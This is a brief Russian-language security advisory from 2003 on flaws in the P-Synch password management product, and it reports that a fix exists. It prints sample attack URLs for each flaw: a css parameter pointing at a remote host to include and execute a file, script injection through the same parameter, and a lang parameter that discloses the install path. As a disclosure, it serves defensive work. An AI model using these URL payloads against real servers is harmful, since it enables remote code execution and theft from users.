Security Lab

Удаленное выполнение произвольных команд и межсайтовый скриптинг в P-Synch

Дата публикации:02.06.2003
Всего просмотров:1175
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие системных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: P-Synch Total Password Management Solution
Описание: Несколько уязвимостей обнаружено в программном обеспечении управления паролями 'P-Synch'. Удаленный пользователь может выполнить произвольные команды на системе.

Сообщается, что удаленный пользователь может определить удаленное расположение для включаемого файла, который будет выполнен на целевом сервере. Пример:

https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file
Также сообщается, что удаленный пользователь может внедрить произвольный код сценария, который будет выполнен в браузере целевого пользователя. Пример:
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]
Также сообщается, что удаленный пользователь может представить следующий тип URL, чтобы определить инсталляционный путь:
https://path/to/psynch/nph-psa.exe?lan g=
https://path/to/psynch/nph-psf.exe?lang=
Ссылки: Multiple Vulnerabilities In P-Synch Password Management